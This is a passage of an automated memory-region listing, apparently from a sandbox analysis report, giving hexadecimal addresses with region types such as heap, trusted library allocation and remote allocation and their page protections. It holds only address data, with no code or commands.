trusted library allocation
page read and write
184C7EE7000
heap
page read and write
24365670000
trusted library allocation
page read and write
2434DA8B000
heap
page read and write
2435B8DF000
trusted library allocation
page read and write
243680E0000
trusted library allocation
page read and write
24358DC3000
trusted library allocation
page read and write
2435DF8E000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2436895F000
trusted library allocation
page read and write
24357D66000
trusted library allocation
page read and write
11A6000
unkown
page readonly
31A9000
heap
page read and write
2435E1E7000
trusted library allocation
page read and write
1F5277E7000
trusted library allocation
page read and write
184C722F000
trusted library allocation
page read and write
2B1E000
heap
page read and write
2436382B000
trusted library allocation
page read and write
25EFE5C4000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
24368108000
trusted library allocation
page read and write
24358FF3000
trusted library allocation
page read and write
321D000
heap
page read and write
2435E086000
trusted library allocation
page read and write
24363388000
trusted library allocation
page read and write
3864000
heap
page read and write
2435C08C000
trusted library allocation
page read and write
385E000
heap
page read and write
2435C180000
trusted library allocation
page read and write
24357DE4000
trusted library allocation
page read and write
2435BA88000
trusted library allocation
page read and write
24363829000
trusted library allocation
page read and write
2435E2DF000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
60A97FE000
unkown
page readonly
1CBA000
heap
page read and write
184C7DB0000
heap
page read and write
2435E083000
trusted library allocation
page read and write
2435CCA2000
trusted library allocation
page read and write
243658F6000
trusted library allocation
page read and write
2435E15A000
trusted library allocation
page read and write
2435DD82000
trusted library allocation
page read and write
3A40000
direct allocation
page read and write
2435B4E9000
trusted library allocation
page read and write
2435E1A8000
trusted library allocation
page read and write
2435D09D000
trusted library allocation
page read and write
322D000
heap
page read and write
2436822A000
trusted library allocation
page read and write
243656B2000
trusted library allocation
page read and write
3C30000
direct allocation
page read and write
243658CC000
trusted library allocation
page read and write
24368494000
trusted library allocation
page read and write
24365888000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435EF91000
trusted library allocation
page read and write
184C7ED8000
heap
page read and write
243577CA000
heap
page read and write
2435E167000
trusted library allocation
page read and write
2435BA5C000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
2435DF3B000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
24364D28000
trusted library allocation
page read and write
2435C8E0000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435E13A000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2434DAB5000
heap
page read and write
2435E0BB000
trusted library allocation
page read and write
24358F13000
trusted library allocation
page read and write
243658CC000
trusted library allocation
page read and write
243638D0000
trusted library allocation
page read and write
2435CC14000
trusted library allocation
page read and write
2435DDFD000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2434DA93000
heap
page read and write
2435C0E0000
trusted library allocation
page read and write
2435B665000
trusted library allocation
page read and write
24357794000
heap
page read and write
295A9A87000
heap
page read and write
2434DAD0000
heap
page read and write
243689EC000
trusted library allocation
page read and write
2435B67E000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
243680F6000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435E2E3000
trusted library allocation
page read and write
2434DAB8000
heap
page read and write
2435C73D000
trusted library allocation
page read and write
2435E24C000
trusted library allocation
page read and write
2435C0FD000
trusted library allocation
page read and write
2435C74B000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
243577CA000
heap
page read and write
2435DDB6000
trusted library allocation
page read and write
2435EFDB000
trusted library allocation
page read and write
2435BAF0000
trusted library allocation
page read and write
2435B8A0000
trusted library allocation
page read and write
2434DA89000
heap
page read and write
2434DA77000
heap
page read and write
2435C0B8000
trusted library allocation
page read and write
3080000
heap
page read and write
184C7310000
heap
page read and write
25EFE1E0000
unclassified section
page read and write
2435B79B000
trusted library allocation
page read and write
B77D000
heap
page read and write
184C70EF000
unclassified section
page read and write
243652A1000
trusted library allocation
page read and write
2435CCAB000
trusted library allocation
page read and write
2435EDAE000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
243683E4000
trusted library allocation
page read and write
1310000
heap
page read and write
243656AF000
trusted library allocation
page read and write
184C7EB4000
heap
page read and write
2BB2000
heap
page read and write
24358F91000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
1294000
unkown
page write copy
2435CC36000
trusted library allocation
page read and write
24358FE3000
trusted library allocation
page read and write
2435B4F1000
trusted library allocation
page read and write
2435C962000
trusted library allocation
page read and write
243680ED000
trusted library allocation
page read and write
24357C23000
trusted library allocation
page read and write
2435E200000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
BD5E000
heap
page read and write
25EFE130000
heap
page read and write
2435E2E5000
trusted library allocation
page read and write
243658FC000
trusted library allocation
page read and write
2435B88C000
trusted library allocation
page read and write
2436821A000
trusted library allocation
page read and write
2435E4F6000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
11A2000
unkown
page read and write
2434DAB2000
heap
page read and write
2435DD48000
trusted library allocation
page read and write
243680FA000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2434DA93000
heap
page read and write
2435DFA7000
trusted library allocation
page read and write
24368A88000
trusted library allocation
page read and write
2435EF84000
trusted library allocation
page read and write
2435C74B000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
B6E8000
heap
page read and write
2435BA35000
trusted library allocation
page read and write
2435E15F000
trusted library allocation
page read and write
2435EFC7000
trusted library allocation
page read and write
2435B8D5000
trusted library allocation
page read and write
BADD000
heap
page read and write
2435DD6F000
trusted library allocation
page read and write
243658E5000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435E207000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435EFA5000
trusted library allocation
page read and write
243652A4000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
2435CCAB000
trusted library allocation
page read and write
2435CC00000
trusted library allocation
page read and write
B5A000
heap
page read and write
2435DF84000
trusted library allocation
page read and write
3864000
heap
page read and write
243684AC000
trusted library allocation
page read and write
25EFE1EF000
unclassified section
page read and write
2ADC000
heap
page read and write
2435DF8E000
trusted library allocation
page read and write
468563E000
unkown
page readonly
1F52736B000
remote allocation
page execute read
243633F1000
trusted library allocation
page read and write
1F5277A7000
trusted library allocation
page read and write
2435EF7F000
trusted library allocation
page read and write
2434D058000
heap
page read and write
2435E11B000
trusted library allocation
page read and write
2436899C000
trusted library allocation
page read and write
B7CE000
heap
page read and write
2BB2000
heap
page read and write
2435E2FB000
trusted library allocation
page read and write
2435E1AB000
trusted library allocation
page read and write
24368011000
trusted library allocation
page read and write
3CD0000
direct allocation
page read and write
2A5E000
heap
page read and write
2A5A000
heap
page read and write
2435B4E2000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2435DD82000
trusted library allocation
page read and write
184C77A0000
heap
page read and write
2436348B000
trusted library allocation
page read and write
243638B9000
trusted library allocation
page read and write
2436849E000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435E248000
trusted library allocation
page read and write
243577CA000
heap
page read and write
2435BA93000
trusted library allocation
page read and write
2435E2F1000
trusted library allocation
page read and write
60A755E000
unkown
page readonly
2435BA1E000
trusted library allocation
page read and write
2435E18F000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435E1F0000
trusted library allocation
page read and write
24358F91000
trusted library allocation
page read and write
2435E1E7000
trusted library allocation
page read and write
243653DD000
trusted library allocation
page read and write
24357C71000
trusted library allocation
page read and write
2435B79B000
trusted library allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
24368139000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
243638BB000
trusted library allocation
page read and write
2435DF00000
trusted library allocation
page read and write
243633CA000
trusted library allocation
page read and write
1F527850000
heap
page read and write
24368494000
trusted library allocation
page read and write
2435C0EB000
trusted library allocation
page read and write
2435C8A6000
trusted library allocation
page read and write
24365893000
trusted library allocation
page read and write
24358F13000
trusted library allocation
page read and write
2435E1F0000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243680FE000
trusted library allocation
page read and write
24368189000
trusted library allocation
page read and write
46801DD000
stack
page read and write
B474000
heap
page read and write
2434DAB8000
heap
page read and write
2435DDFD000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
2435B4F0000
trusted library allocation
page read and write
2436585E000
trusted library allocation
page read and write
2435B47C000
trusted library allocation
page read and write
243689E6000
trusted library allocation
page read and write
24358F11000
trusted library allocation
page read and write
24358FE3000
trusted library allocation
page read and write
2435C84E000
trusted library allocation
page read and write
24368041000
trusted library allocation
page read and write
2435DF4A000
trusted library allocation
page read and write
2435C7A2000
trusted library allocation
page read and write
BB60000
direct allocation
page read and write
2A1E000
stack
page read and write
2435C0FA000
trusted library allocation
page read and write
24358F0F000
trusted library allocation
page read and write
3800000
direct allocation
page read and write
2436548B000
trusted library allocation
page read and write
24363725000
trusted library allocation
page read and write
24358F34000
trusted library allocation
page read and write
243652CA000
trusted library allocation
page read and write
2435C732000
trusted library allocation
page read and write
2435DE4D000
trusted library allocation
page read and write
243633FA000
trusted library allocation
page read and write
2435B469000
trusted library allocation
page read and write
6E0000
heap
page read and write
2435EFEE000
trusted library allocation
page read and write
243684B3000
trusted library allocation
page read and write
243638A8000
trusted library allocation
page read and write
24368189000
trusted library allocation
page read and write
2436821A000
trusted library allocation
page read and write
24365530000
trusted library allocation
page read and write
2435CC00000
trusted library allocation
page read and write
2B03000
heap
page read and write
243689CE000
trusted library allocation
page read and write
243684D1000
trusted library allocation
page read and write
243683D9000
trusted library allocation
page read and write
2435B65E000
trusted library allocation
page read and write
3740000
direct allocation
page read and write
243696E5000
heap
page read and write
2435DF57000
trusted library allocation
page read and write
3853000
heap
page read and write
2434DA93000
heap
page read and write
2435B88C000
trusted library allocation
page read and write
295A9E96000
heap
page read and write
2435C045000
trusted library allocation
page read and write
243658D5000
trusted library allocation
page read and write
24368481000
trusted library allocation
page read and write
2436341A000
trusted library allocation
page read and write
2435C0F2000
trusted library allocation
page read and write
2435E15F000
trusted library allocation
page read and write
3530000
direct allocation
page read and write
243577CA000
heap
page read and write
1F527512000
unclassified section
page read and write
2435C7F9000
trusted library allocation
page read and write
25EFE300000
heap
page read and write
2435E13A000
trusted library allocation
page read and write
243658CC000
trusted library allocation
page read and write
2BB2000
heap
page read and write
184C7E3F000
heap
page read and write
184C7ED8000
heap
page read and write
243684AC000
trusted library allocation
page read and write
2434DA7A000
heap
page read and write
2435E2F3000
trusted library allocation
page read and write
2435C7EB000
trusted library allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
2435C099000
trusted library allocation
page read and write
2435DEF6000
trusted library allocation
page read and write
24365490000
trusted library allocation
page read and write
2435E1C3000
trusted library allocation
page read and write
1F52775D000
trusted library allocation
page read and write
243681DE000
trusted library allocation
page read and write
2435E1EE000
trusted library allocation
page read and write
241A000
heap
page read and write
2435D5F9000
trusted library allocation
page read and write
2435E149000
trusted library allocation
page read and write
2B17000
heap
page read and write
2435E4BD000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
243652F6000
trusted library allocation
page read and write
243654E8000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2435EE98000
trusted library allocation
page read and write
2435DEAE000
trusted library allocation
page read and write
2435B785000
trusted library allocation
page read and write
2434DA89000
heap
page read and write
2434DAD0000
heap
page read and write
2435C0D2000
trusted library allocation
page read and write
1F527700000
trusted library allocation
page read and write
24363830000
trusted library allocation
page read and write
39B0000
direct allocation
page read and write
2435E2FB000
trusted library allocation
page read and write
2435B43B000
trusted library allocation
page read and write
B46E000
heap
page read and write
243654B9000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2435B8C7000
trusted library allocation
page read and write
243681DE000
trusted library allocation
page read and write
2434DA7A000
heap
page read and write
2435C7EB000
trusted library allocation
page read and write
2435E13C000
trusted library allocation
page read and write
2436847F000
trusted library allocation
page read and write
2434DAD8000
heap
page read and write
25EFE800000
trusted library allocation
page read and write
24358FFE000
trusted library allocation
page read and write
B4C0000
direct allocation
page read and write
2435CC3F000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435B856000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
184C7E38000
heap
page read and write
184C726F000
trusted library allocation
page read and write
2434DADA000
heap
page read and write
782000
heap
page read and write
184C7E9A000
heap
page read and write
24369328000
trusted library allocation
page read and write
309E000
heap
page read and write
24359397000
trusted library allocation
page read and write
4D18000
heap
page read and write
31BB000
heap
page read and write
B9FCC3E000
unkown
page readonly
243658EE000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
2435DC81000
trusted library allocation
page read and write
2434DA7A000
heap
page read and write
2434DAB0000
heap
page read and write
9E0000
heap
page read and write
2435C0E0000
trusted library allocation
page read and write
2435E2F5000
trusted library allocation
page read and write
295AB645000
heap
page read and write
2BB2000
heap
page read and write
3182000
heap
page read and write
184C7E41000
heap
page read and write
3B40000
direct allocation
page read and write
323D000
heap
page read and write
243658D3000
trusted library allocation
page read and write
2AF7000
heap
page read and write
2435BA56000
trusted library allocation
page read and write
2435E2DF000
trusted library allocation
page read and write
C88000
unkown
page readonly
2435EE13000
trusted library allocation
page read and write
BEC0000
direct allocation
page read and write
2435DF1F000
trusted library allocation
page read and write
24364D11000
trusted library allocation
page read and write
24358F90000
trusted library allocation
page read and write
2435EF7F000
trusted library allocation
page read and write
243681CB000
trusted library allocation
page read and write
2436849E000
trusted library allocation
page read and write
401000
unkown
page execute read
1F527797000
trusted library allocation
page read and write
2435B863000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435C767000
trusted library allocation
page read and write
3230000
direct allocation
page read and write
24358FE8000
trusted library allocation
page read and write
243683E4000
trusted library allocation
page read and write
184C7EC8000
heap
page read and write
2435C0D9000
trusted library allocation
page read and write
2435D0FC000
trusted library allocation
page read and write
243684B2000
trusted library allocation
page read and write
184C729E000
trusted library allocation
page read and write
2435E0A8000
trusted library allocation
page read and write
2435E24E000
trusted library allocation
page read and write
3980000
direct allocation
page read and write
2435E467000
trusted library allocation
page read and write
243638A2000
trusted library allocation
page read and write
184C7DAF000
heap
page read and write
1F527500000
heap
page readonly
24358F89000
trusted library allocation
page read and write
2435C89B000
trusted library allocation
page read and write
2435E140000
trusted library allocation
page read and write
2435D0F4000
trusted library allocation
page read and write
184C7E91000
heap
page read and write
24357D75000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
24369330000
trusted library allocation
page read and write
24368AD8000
trusted library allocation
page read and write
243577D3000
heap
page read and write
2434DAC7000
heap
page read and write
24368481000
trusted library allocation
page read and write
24368189000
trusted library allocation
page read and write
2436373F000
trusted library allocation
page read and write
2435C0EB000
trusted library allocation
page read and write
B9F994E000
stack
page read and write
2435C761000
trusted library allocation
page read and write
243652EF000
trusted library allocation
page read and write
2435B897000
trusted library allocation
page read and write
24363414000
trusted library allocation
page read and write
2435DC77000
trusted library allocation
page read and write
2435DF3F000
trusted library allocation
page read and write
2435E463000
trusted library allocation
page read and write
243638A2000
trusted library allocation
page read and write
2435DF88000
trusted library allocation
page read and write
2435E1CB000
trusted library allocation
page read and write
2435E1D9000
trusted library allocation
page read and write
2435B8E8000
trusted library allocation
page read and write
2435DFA5000
trusted library allocation
page read and write
2435E0D2000
trusted library allocation
page read and write
18EB9FEB000
trusted library allocation
page execute read
2435E28B000
trusted library allocation
page read and write
2435B8D5000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
2435B6C9000
trusted library allocation
page read and write
24363723000
trusted library allocation
page read and write
1F527913000
trusted library allocation
page read and write
24363718000
trusted library allocation
page read and write
2435EEC3000
trusted library allocation
page read and write
243689C6000
trusted library allocation
page read and write
184C7212000
trusted library allocation
page read and write
243683FC000
trusted library allocation
page read and write
2435B46F000
trusted library allocation
page read and write
2435E25C000
trusted library allocation
page read and write
2435ED6E000
trusted library allocation
page read and write
243638BB000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435ED30000
trusted library allocation
page read and write
3A70000
direct allocation
page read and write
24368AB8000
trusted library allocation
page read and write
2435CD7B000
trusted library allocation
page read and write
3A00000
direct allocation
page read and write
24369605000
heap
page read and write
24363414000
trusted library allocation
page read and write
2435BA6F000
trusted library allocation
page read and write
243654E3000
trusted library allocation
page read and write
3300000
direct allocation
page read and write
2435DFE0000
trusted library allocation
page read and write
3217000
heap
page read and write
243656FC000
trusted library allocation
page read and write
2436552D000
trusted library allocation
page read and write
2435E128000
trusted library allocation
page read and write
184C7EC8000
heap
page read and write
2435E11F000
trusted library allocation
page read and write
2435B8E2000
trusted library allocation
page read and write
2435E1D3000
trusted library allocation
page read and write
2435DFAF000
trusted library allocation
page read and write
2435E2C4000
trusted library allocation
page read and write
243653BD000
trusted library allocation
page read and write
2436587E000
trusted library allocation
page read and write
2435BA6F000
trusted library allocation
page read and write
2435C761000
trusted library allocation
page read and write
243684A4000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2435C8F4000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
321A000
heap
page read and write
295A9A6E000
heap
page read and write
2435BA33000
trusted library allocation
page read and write
24368356000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
1CB8000
heap
page read and write
2435DF81000
trusted library allocation
page read and write
2AFC000
heap
page read and write
24358FE0000
trusted library allocation
page read and write
2435E1DD000
trusted library allocation
page read and write
243638EE000
trusted library allocation
page read and write
2435C0E0000
trusted library allocation
page read and write
2B40000
heap
page read and write
243653C8000
trusted library allocation
page read and write
243638F0000
trusted library allocation
page read and write
2435E211000
trusted library allocation
page read and write
3C80000
direct allocation
page read and write
2435B464000
trusted library allocation
page read and write
2435B4B8000
trusted library allocation
page read and write
243652F6000
trusted library allocation
page read and write
2435C8C2000
trusted library allocation
page read and write
243574EF000
trusted library allocation
page read and write
40C000
unkown
page readonly
2435E14D000
trusted library allocation
page read and write
24363416000
trusted library allocation
page read and write
4ADE000
stack
page read and write
2435DFF4000
trusted library allocation
page read and write
2435E250000
trusted library allocation
page read and write
24358F7A000
trusted library allocation
page read and write
2435B8C2000
trusted library allocation
page read and write
184C7EC8000
heap
page read and write
2435D035000
trusted library allocation
page read and write
1290000
unkown
page read and write
2435E49D000
trusted library allocation
page read and write
3C40000
direct allocation
page read and write
2435B856000
trusted library allocation
page read and write
24363719000
trusted library allocation
page read and write
2435DF3F000
trusted library allocation
page read and write
2435C996000
trusted library allocation
page read and write
2435E271000
trusted library allocation
page read and write
184C7EE7000
heap
page read and write
2436947C000
trusted library allocation
page read and write
184C78C0000
trusted library section
page readonly
2436812E000
trusted library allocation
page read and write
24368482000
trusted library allocation
page read and write
2435C82D000
trusted library allocation
page read and write
25EFE13A000
heap
page read and write
2435EFBB000
trusted library allocation
page read and write
2435E1AB000
trusted library allocation
page read and write
24358DAD000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
295A9B60000
heap
page read and write
FB9000
heap
page read and write
2435B839000
trusted library allocation
page read and write
2435CC64000
trusted library allocation
page read and write
243638D2000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
24365538000
trusted library allocation
page read and write
24357C2F000
trusted library allocation
page read and write
2435DEFC000
trusted library allocation
page read and write
2435B43B000
trusted library allocation
page read and write
2435B79B000
trusted library allocation
page read and write
2435DF3B000
trusted library allocation
page read and write
C88000
unkown
page readonly
2434DA84000
heap
page read and write
2435C0A8000
trusted library allocation
page read and write
24358F8C000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
2435DFAD000
trusted library allocation
page read and write
24357D26000
trusted library allocation
page read and write
2435E13C000
trusted library allocation
page read and write
184C7E41000
heap
page read and write
184C7DB4000
heap
page read and write
243680BD000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
36C0000
direct allocation
page read and write
2435B889000
trusted library allocation
page read and write
2435E26F000
trusted library allocation
page read and write
3A90000
direct allocation
page read and write
2435C09B000
trusted library allocation
page read and write
2435B83B000
trusted library allocation
page read and write
2435C8F4000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
2434DAB2000
heap
page read and write
21C5000
heap
page read and write
2434DA93000
heap
page read and write
24364D00000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2435DD3F000
trusted library allocation
page read and write
2435BA60000
trusted library allocation
page read and write
2435E248000
trusted library allocation
page read and write
24365258000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2436898F000
trusted library allocation
page read and write
243652EF000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
4C80000
heap
page read and write
2435B4DE000
trusted library allocation
page read and write
2435EEC0000
trusted library allocation
page read and write
24358FE8000
trusted library allocation
page read and write
243577CA000
heap
page read and write
243683FC000
trusted library allocation
page read and write
2435DD71000
trusted library allocation
page read and write
24363792000
trusted library allocation
page read and write
2436342D000
trusted library allocation
page read and write
243683AE000
trusted library allocation
page read and write
184C7EE7000
heap
page read and write
243658A6000
trusted library allocation
page read and write
2435DC5C000
trusted library allocation
page read and write
243684DF000
trusted library allocation
page read and write
2435EFF2000
trusted library allocation
page read and write
2435B469000
trusted library allocation
page read and write
2435C767000
trusted library allocation
page read and write
243577AF000
heap
page read and write
24357D17000
trusted library allocation
page read and write
243593B2000
trusted library allocation
page read and write
1F5277B7000
trusted library allocation
page read and write
2435DE53000
trusted library allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
2434D06E000
heap
page read and write
184C7DDD000
heap
page read and write
2435C8F5000
trusted library allocation
page read and write
2435E1DD000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
3AC0000
direct allocation
page read and write
24358DC6000
trusted library allocation
page read and write
243680E9000
trusted library allocation
page read and write
243633D0000
trusted library allocation
page read and write
25EFDFF1000
remote allocation
page execute read
24363456000
trusted library allocation
page read and write
2435EFDC000
trusted library allocation
page read and write
2435DF84000
trusted library allocation
page read and write
24358F90000
trusted library allocation
page read and write
2435938B000
trusted library allocation
page read and write
2435EF6C000
trusted library allocation
page read and write
243652DB000
trusted library allocation
page read and write
37F7000
heap
page read and write
2435C7A0000
trusted library allocation
page read and write
25EFE1E2000
unclassified section
page read and write
2435DDDD000
trusted library allocation
page read and write
2435DABB000
trusted library allocation
page read and write
24358D7D000
trusted library allocation
page read and write
3960000
direct allocation
page read and write
2435E26A000
trusted library allocation
page read and write
24365237000
trusted library allocation
page read and write
2435E1FE000
trusted library allocation
page read and write
184C7DB9000
heap
page read and write
2434DAB9000
heap
page read and write
243658EE000
trusted library allocation
page read and write
2435C7A7000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435E080000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
243653FE000
trusted library allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
37E0000
direct allocation
page read and write
2435C924000
trusted library allocation
page read and write
24357D93000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
24365898000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
243658F6000
trusted library allocation
page read and write
295AB650000
heap
page read and write
24358F64000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
1698000
heap
page read and write
1CB9000
heap
page read and write
243654D4000
trusted library allocation
page read and write
2435BA93000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
B5C1000
heap
page read and write
243681CB000
trusted library allocation
page read and write
1F527779000
trusted library allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
2435EF25000
trusted library allocation
page read and write
243684A4000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
2434DA93000
heap
page read and write
2435C9E8000
trusted library allocation
page read and write
2435C0A0000
trusted library allocation
page read and write
243633BA000
trusted library allocation
page read and write
2436932D000
trusted library allocation
page read and write
24358D60000
trusted library allocation
page read and write
2AF9000
heap
page read and write
243652E3000
trusted library allocation
page read and write
2435C7DF000
trusted library allocation
page read and write
2435B4A7000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
2435B7CA000
trusted library allocation
page read and write
243684CC000
trusted library allocation
page read and write
24365865000
trusted library allocation
page read and write
2435EFA0000
trusted library allocation
page read and write
2435B4F1000
trusted library allocation
page read and write
1BFA000
heap
page read and write
2B01000
heap
page read and write
2435C856000
trusted library allocation
page read and write
1E8C1449000
heap
page read and write
2435DFAF000
trusted library allocation
page read and write
25EFE572000
trusted library allocation
page read and write
243652EF000
trusted library allocation
page read and write
2435C761000
trusted library allocation
page read and write
2A56000
heap
page read and write
2435E2E7000
trusted library allocation
page read and write
2435D44D000
trusted library allocation
page read and write
243593C7000
trusted library allocation
page read and write
35A0000
direct allocation
page read and write
2434DAE1000
heap
page read and write
2435EF72000
trusted library allocation
page read and write
2436897C000
trusted library allocation
page read and write
295AB65E000
heap
page read and write
24368ABF000
trusted library allocation
page read and write
2435C0FE000
trusted library allocation
page read and write
2436895F000
trusted library allocation
page read and write
243577B1000
heap
page read and write
24358D56000
trusted library allocation
page read and write
2435DEEB000
trusted library allocation
page read and write
2435E1E7000
trusted library allocation
page read and write
2435E037000
trusted library allocation
page read and write
295AB64E000
heap
page read and write
2435C896000
trusted library allocation
page read and write
3680000
direct allocation
page read and write
2435E120000
trusted library allocation
page read and write
3930000
direct allocation
page read and write
2435B4C9000
trusted library allocation
page read and write
1E8C1607000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2435DF88000
trusted library allocation
page read and write
2303000
heap
page read and write
2A6B000
heap
page read and write
154684524000
trusted library allocation
page read and write
2435C7F9000
trusted library allocation
page read and write
2435C7A2000
trusted library allocation
page read and write
2435DCDF000
trusted library allocation
page read and write
243680F8000
trusted library allocation
page read and write
24358D56000
trusted library allocation
page read and write
24363875000
trusted library allocation
page read and write
243680F6000
trusted library allocation
page read and write
184C78A0000
trusted library allocation
page read and write
243577B4000
heap
page read and write
2435C09F000
trusted library allocation
page read and write
243680CF000
trusted library allocation
page read and write
B5C0000
heap
page read and write
3CA0000
direct allocation
page read and write
2B08000
heap
page read and write
1F5272E0000
unclassified section
page readonly
2435DFD1000
trusted library allocation
page read and write
24363750000
trusted library allocation
page read and write
243680DF000
trusted library allocation
page read and write
2434DAB2000
heap
page read and write
2434DABC000
heap
page read and write
18EB9FF0000
trusted library allocation
page execute read
C50000
unkown
page readonly
2435C752000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
2435BA4F000
trusted library allocation
page read and write
B77F000
heap
page read and write
2435C7EB000
trusted library allocation
page read and write
2435C0D6000
trusted library allocation
page read and write
2436587F000
trusted library allocation
page read and write
2435B8D5000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
24369100000
trusted library allocation
page read and write
73B000
heap
page read and write
24363412000
trusted library allocation
page read and write
243638C1000
trusted library allocation
page read and write
243681D4000
trusted library allocation
page read and write
970000
heap
page read and write
2435B845000
trusted library allocation
page read and write
24368997000
trusted library allocation
page read and write
2435EFBB000
trusted library allocation
page read and write
2435E08D000
trusted library allocation
page read and write
2436813F000
trusted library allocation
page read and write
2435C795000
trusted library allocation
page read and write
2435E21E000
trusted library allocation
page read and write
2435E287000
trusted library allocation
page read and write
2435E090000
trusted library allocation
page read and write
2435B428000
trusted library allocation
page read and write
25EFE1C0000
heap
page readonly
24358DF2000
trusted library allocation
page read and write
2435E149000
trusted library allocation
page read and write
243577AA000
heap
page read and write
2435EF44000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
243593CA000
trusted library allocation
page read and write
322B000
heap
page read and write
3580000
direct allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
2BB2000
heap
page read and write
1B76000
heap
page read and write
3810000
direct allocation
page read and write
2435E250000
trusted library allocation
page read and write
25EFE524000
trusted library allocation
page read and write
2435DF4C000
trusted library allocation
page read and write
1F5277BA000
trusted library allocation
page read and write
2436371E000
trusted library allocation
page read and write
184C7275000
trusted library allocation
page read and write
32F0000
direct allocation
page read and write
2BB2000
heap
page read and write
2435C8C2000
trusted library allocation
page read and write
24363792000
trusted library allocation
page read and write
2435E1EC000
trusted library allocation
page read and write
184C7264000
trusted library allocation
page read and write
2435B864000
trusted library allocation
page read and write
2435C815000
trusted library allocation
page read and write
2435B43B000
trusted library allocation
page read and write
2435B889000
trusted library allocation
page read and write
24358DF2000
trusted library allocation
page read and write
2435C82B000
trusted library allocation
page read and write
2435E1F0000
trusted library allocation
page read and write
2644000
heap
page read and write
2435E1DD000
trusted library allocation
page read and write
11A4000
unkown
page write copy
2435DEC7000
trusted library allocation
page read and write
2435E1A8000
trusted library allocation
page read and write
2435C0F2000
trusted library allocation
page read and write
24363464000
trusted library allocation
page read and write
243638F1000
trusted library allocation
page read and write
24357DDB000
trusted library allocation
page read and write
2435B42D000
trusted library allocation
page read and write
2435930E000
trusted library allocation
page read and write
1F0000
heap
page read and write
2435CC69000
trusted library allocation
page read and write
37E9000
heap
page read and write
2436801E000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
119E000
unkown
page write copy
2435CA09000
trusted library allocation
page read and write
2434DA8F000
heap
page read and write
2435E149000
trusted library allocation
page read and write
2435ED70000
trusted library allocation
page read and write
3CF0000
direct allocation
page read and write
2435E285000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
2434DAD0000
heap
page read and write
DB0000
direct allocation
page read and write
2436584F000
trusted library allocation
page read and write
295A9A87000
heap
page read and write
243680C1000
trusted library allocation
page read and write
24365890000
trusted library allocation
page read and write
2436813E000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
24358FB3000
trusted library allocation
page read and write
243658C1000
trusted library allocation
page read and write
2BB2000
heap
page read and write
60A749B000
stack
page read and write
2436969D000
heap
page read and write
2AFB000
heap
page read and write
2435BA31000
trusted library allocation
page read and write
243638B7000
trusted library allocation
page read and write
24358F86000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
18EBA021000
trusted library allocation
page execute read
2434DABC000
heap
page read and write
2434DAD0000
heap
page read and write
24368097000
trusted library allocation
page read and write
1C0B000
heap
page read and write
2435CC3F000
trusted library allocation
page read and write
243658E5000
